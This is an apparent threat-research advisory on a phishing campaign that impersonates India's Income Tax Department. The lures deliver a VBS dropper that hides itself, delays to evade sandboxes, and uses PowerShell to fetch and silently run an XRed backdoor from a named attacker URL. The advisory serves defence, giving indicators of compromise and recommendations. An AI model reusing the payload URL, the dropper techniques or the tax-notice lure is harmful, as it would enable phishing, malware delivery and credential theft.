XRed Malware Campaign Targets Multinational Organizations

10 December 2025

By Samantha Clarke, Hiwot Mendahun, Ankit Gupta and the Mimecast Threat Research Team

Campaign Overview

The Mimecast Threat Research team has identified an ongoing malware campaign that leverages fraudulent office memorandums impersonating the Income Tax Department, Government of India. Organizations being targeted primarily contain Indian subsidiaries and have a UK or US based head office. Analysis reveals threat actors demonstrate sophisticated target selection, focusing on medium-to-large enterprises (typically 1,000+ employees) in B2B sectors, particularly financial services, professional services, and corporate administration.

Active since October 2025, this campaign employs social engineering tactics designed to exploit the urgency associated with tax compliance and potential penalties. Recipients receive emails containing links to see the various tax violations that the business has.

Key email attributes

• Japanese Infrastructure: Emails originate from IP addresses associated with Japanese Autonomous System Numbers, suggesting compromised systems or deliberate infrastructure choices to evade regional security controls.
• Legacy Email Clients: Email headers reveal the use of Foxmail and outdated versions of Microsoft Outlook (indicated by X-Mailer values), which may help bypass modern email security controls that focus on current threat patterns.
• Schema-less URLs: Malicious links sometimes appear without standard URL schemas (missing "http://" or "https://"), potentially evading basic URL filtering mechanisms.
• Unauthenticated Sending: Messages originate from mail servers requiring no authentication, a characteristic that enables easier spoofing but also provides detection opportunities.

Once the user clicks on the link, they are taken to the following page that mimic official government communications.

These pages feature both Hindi and English text and reference Section 271(1)(c) of the Income Tax Act, which pertains to penalties for concealment of income or furnishing inaccurate particulars. The notice demands submission of documents within 72 hours and includes a "Download Documents" button that serves as the initial infection vector.

Technical Infection Chain

When victims click the "Download Documents" button, they unknowingly download a malicious VBS (Visual Basic Script) file, typically named "Tax Penalty Notice.vbs." Upon execution, this script contacts a remote server and downloads an executable file from a suspicious domain. Based on analysis of the command and control infrastructure, one of the campaigns observed appears linked to the Xred malware family.

When a recipient opens the malicious VBS file, a security warning is shown to the user to continue to open the file, if the user continues the script executes automatically without requiring additional user interaction.

The script first attempts to relaunch itself in a hidden window to avoid detection, ensuring its operations remain invisible to the user. Upon initialization, the script creates a directory at C:\SystemUpdates if it does not already exist. All subsequent actions are logged to C:\SystemUpdates\update_log.txt, including start and end times of the script execution. This logging mechanism provides the threat actors with visibility into successful infections and may assist in troubleshooting failed deployment attempts.

After establishing its operational environment, the script introduces a random delay between 8 and 15 seconds. This delay serves as an anti-analysis technique, potentially evading automated sandbox environments that expect immediate malicious behaviour within short analysis windows. Following the delay period, the script constructs and executes a PowerShell command designed to download an executable file from the remote location https://googlevip.shop/216.250.104.166ClientSetup[.]exe.

The downloaded file is saved locally as C:\SystemUpdates\216.250.104.166ClientSetup[.]exe. If the download completes successfully and the file exists on the local system, the PowerShell command proceeds to execute the payload silently, preventing any user notification or consent dialogs. One campaign observed appears to be linked to the XRed malware which has a primary function as a trojan backdoor and once a system is infected, XRed can perform numerous malicious activities

• Data Exfiltration: It collects sensitive system information (e.g., username, MAC address, computer name) and transmits it to the attacker.
• Keylogging: It records keystrokes to steal credentials for emails, social media, banking, and cryptocurrency accounts.
• Remote Control: The attacker can execute various commands remotely, including capturing screenshots, accessing the command line, and listing, downloading, or deleting files.
• Persistence: It uses registry keys and hidden directories (such as C:\ProgramData\Synaptics\) to maintain a persistent presence on the system.
• Additional Payloads: It can download and install other types of malware onto the compromised machine

Mimecast Protection

The Mimecast Threat Research team has identified multiple attributes within this campaign and incorporated them into our detection capabilities. We continue to monitor for infrastructure changes and technique evolution as threat actors adapt their operations.

Targets

Primary Region: India or predominantly UK and US businesses which have an entity in India. Non-random selection, with consistent focus on medium-to-large organizations (1,000+ employees) operating multi-jurisdictional environments.
Industries Affected: Across many industries, with elevated concentration in financial services, professional services (accounting, legal, consulting), corporate administration, supply chain/logistics, and manufacturing sectors. The campaign shows preference for B2B-focused organizations with complex vendor ecosystems and cross-border operations.

Indicators of Compromise (IOCs)

Sender Email Addresses

• urabe@kcc.zaq.ne.jp
• hase.3@jcom.zaq.ne.jp
• akomai@jcom.zaq.ne.jp
• servant@jcom.zaq.ne.jp
• sho552004@jcom.zaq.ne.jp

Malicious Files

• Hash (Xred-related): 0447426535047cae9870c99e8b66d8030c9b1492856445ef630c9c07a3fb42da
• Hash: 5178a2e904e239eb02b836227e48c0a99b02031a91136395a6c70a81d0ef3ee1

Malicious Domains

• googlevip[.]shop/
• dadasf[.]qpon/
• googleaxc[.]shop/
• googlem[.]com/

Recommendations

User Security Awareness

• Educate users about the increasing prevalence of government agency impersonation, emphasizing that legitimate tax authorities typically do not send urgent payment or document demands via email with downloadable attachments.
• Verification protocols: Establish clear procedures for employees to verify suspicious government communications through official channels before taking any action.
• Regional awareness: For organizations with operations in India, conduct targeted training on local tax authority communication methods and common impersonation tactics. Organizations matching the target profile (medium-to-large enterprises with Indian subsidiaries in financial or professional services sectors) should prioritize awareness training for finance and compliance personnel with access to Indian entity operations.

Proactive Threat Hunting

• Email log analysis: Search email receipt logs for messages originating from the identified sender domains and email addresses, particularly those directed to finance, compliance, or operations personnel with Indian entity responsibilities.
• URL log anlaysis: Search URL logs for technical indicators associated with these campaigns

Organizations operating in or conducting business with India should remain vigilant for similar campaigns and ensure their security controls account for geographically targeted threats that may bypass region-agnostic detection methods. Organizations with 1,000+ employees and substantial Indian operations face elevated risk due to the campaign's demonstrated targeting patterns.